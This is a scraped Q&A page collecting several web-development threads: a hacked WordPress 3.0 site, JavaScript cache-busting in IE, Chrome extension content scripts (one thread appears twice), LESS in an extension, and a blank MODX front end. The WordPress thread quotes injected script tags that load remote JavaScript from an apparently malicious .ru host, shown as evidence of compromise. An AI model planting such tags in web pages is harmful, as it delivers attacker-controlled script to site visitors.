wordpress 3.0 security? - security

I have a website with wordpress 3.0.
I noticed that /wp-admin displays the following error today.
Warning: Cannot modify header information - headers already sent by (output started at /www/sites/..com/files/html/wp-includes/default-constants.php:299) in /www/sites/..com/files/html/wp-includes/pluggable.php on line 890
I used IE's view source. I found the following code.
script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script>
<!--661c36e2c5591b25cbc164e7b376623b-->
<script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script>
<!--661c36e2c5591b25cbc164e7b376623b--><script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script>
<!--661c36e2c5591b25cbc164e7b376623b--><br />
it looks like my website has been hacked.
I enabled cforms plugin only.
any ideas or suggestions?

Pull the server offline, then run a security audit on it and any client that can upload content to it. Then change all your passwords.

Related

javascript latest file not download in IE without cache clear

I have do to some changes in Javascript files. i deployed in my server and reset IIS.
I tried to launch from IE , the latest modified file changes cannot appear. It reads old file.
If I have to clear the cache , it will work. without clear cache how to work with latest files.
Please give a guidance to resolve this issue.
Thanks.
//try to get the value for time now and to add it to the script file url as version id
<html>
<title>
<script src='http://example.com/js/main.js?ver=<%=DateTime.Now.Ticks%>'
type='text/javascript' ></script>
<title>
<body>
</body>
</html>
You should check cache control options in your IIS.
For flushing cache you can use some variables in js links.
For example:
http://domain.com/js/main.js
and
http://domain.com/js/main.js?ver=1
downloads same file, but second link downloads file like new resource

How to run content script code on an HTML file locally hosted by Google Chrome Extension? [duplicate]

I want to run a content script on an iframe with a chrome-extension:// URL. I added a line to my manifest.json that I copied out of the documentation http://code.google.com/chrome/extensions/match_patterns.html
chrome-extension://*/*
But when I reload my extension I get an alert:
Could not load extension from '/work/sirius/extension'.
Invalid value for 'content_scripts[2].matches[0]': Invalid scheme.
Any idea how to get this to worK?
No. Only ftp:, file:, http: and https: can be matched by a content script declaration.
Invalid URL patterns at any of the matches and exclude_matches fields are rejected (generating an error when trying to load the extension).
Invalid patterns at the permissions option in the manifest file are ignored.
If you want to run a script on a tab from your extension, use chrome.extension.getViews in your background script.
Even better, design your extension's pages such that they effectively communicate with each other (example).
I'm having the exact same problem, look at the API http://code.google.com/chrome/extensions/match_patterns.html it says clearly that they accept chrome-extension://*/* yet they don't.
They need to update the API so as not to confuse people.
It seems that Chrome authors have silently removed the ability for content scripts to be injected into chrome-extension: pages. Documentation still says that it works and even contains examples with chrome-extension: scheme but actually it doesn't work. So now only http:, https: and ftp: work "from the box" and file: can work if user of your extension has enabled this on Extensions (chrome://extensions/) page.
Update: now documentation referred above is updated and says nothing about ability to inject content scripts to chrome-extension: pages.
You can inject js to your iframe html(chrome-extension: pages) without declaring it in manifast.json. The injected js can visit Chrome APIs directly.
iframe.html:
<!DOCTYPE html>
<html>
<head>
...
</head>
<body>
...
</body>
<script src="iframe.js"></script>
</html>
iframe.js:
console.log(chrome); // {loadTimes: ƒ, csi: ƒ, …}

Using LESS in a Chrome Extension

I'm attempting to use LESS in a tab created via a Chrome extension (chrome.tabs.create), but I'm getting a cross domain error ("NETWORK_ERR: XMLHttpRequest Exception 101"), referring to the LESS JavaScript file. I'm not clear on how to set up the permissions. Adding the LESS JavaScript file to "web_accessible_resources" doesn't seem to help. All other files, such as css and js files load fine. It seems I only receive this error from within the less source. Any ideas?
To explain my setup a bit more, the LESS JavaScript file and .less file are loaded in an HTML file something like this:
<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet/less" href="static/css/main.less">
<script src="/static/js/jquery-1.8.2.min.js"></script>
</head>
<body>
Whatever...
</body>
</html>
This html file is loaded in background.js like this:
chrome.browserAction.onClicked.addListener(function() {
chrome.tabs.create({url: 'mypage.html'})
});
The manifest file has permissions for "tabs" and "all urls", and loads background.js.
I'm not sure where you include the client side less.js compiler. See also: http://lesscss.org/#client-side-usage. Less.js is a client-side javascript. It seems the less.js loads from an other URL (domain) than your main.less file. This can be fixed by enabeling CORS, see: http://enable-cors.org/. On the domain where home.less has been installed, the server should send an Access-Control-Allow-Origin: * header.
less.js loads the less files with a XMLHttpRequests which supports CORS for most modern browsers see http://caniuse.com/#search=cors. More details can be found at http://www.html5rocks.com/en/tutorials/cors/
For development use less.js from local folder.
<link rel="stylesheet/less" type="text/css" href="styles.less" />
<script src="less.js" type="text/javascript"></script>
for release use any less compiler like lessc.

Does content_scripts matches "chrome-extension://*/*" work?

I want to run a content script on an iframe with a chrome-extension:// URL. I added a line to my manifest.json that I copied out of the documentation http://code.google.com/chrome/extensions/match_patterns.html
chrome-extension://*/*
But when I reload my extension I get an alert:
Could not load extension from '/work/sirius/extension'.
Invalid value for 'content_scripts[2].matches[0]': Invalid scheme.
Any idea how to get this to worK?
No. Only ftp:, file:, http: and https: can be matched by a content script declaration.
Invalid URL patterns at any of the matches and exclude_matches fields are rejected (generating an error when trying to load the extension).
Invalid patterns at the permissions option in the manifest file are ignored.
If you want to run a script on a tab from your extension, use chrome.extension.getViews in your background script.
Even better, design your extension's pages such that they effectively communicate with each other (example).
I'm having the exact same problem, look at the API http://code.google.com/chrome/extensions/match_patterns.html it says clearly that they accept chrome-extension://*/* yet they don't.
They need to update the API so as not to confuse people.
It seems that Chrome authors have silently removed the ability for content scripts to be injected into chrome-extension: pages. Documentation still says that it works and even contains examples with chrome-extension: scheme but actually it doesn't work. So now only http:, https: and ftp: work "from the box" and file: can work if user of your extension has enabled this on Extensions (chrome://extensions/) page.
Update: now documentation referred above is updated and says nothing about ability to inject content scripts to chrome-extension: pages.
You can inject js to your iframe html(chrome-extension: pages) without declaring it in manifast.json. The injected js can visit Chrome APIs directly.
iframe.html:
<!DOCTYPE html>
<html>
<head>
...
</head>
<body>
...
</body>
<script src="iframe.js"></script>
</html>
iframe.js:
console.log(chrome); // {loadTimes: ƒ, csi: ƒ, …}

Modx Front End not Showing Up

I installed modx Revolution and everything is working fine in the manager, except the front end, when i browse to the local website nothing shows up, just a
<html>
<head>
<title>MODX Revolution - Home</title>
<base href="http://evosoccer.loc/EvoSoccer/" />
</head>
<body>
</body>
</html>
I checked the error log in/cache/logs and the log page from the manager and it has zero records, how do i troubleshoot this?
--
Regards.
Yehia
you have no template or content installed... by default a modx installation is completely empty.
you can install a demo site from the package management if you just wanted to kick the tires.... otherwise in the resource manager just place some content in the home template. then you should see something.
-sean

Resources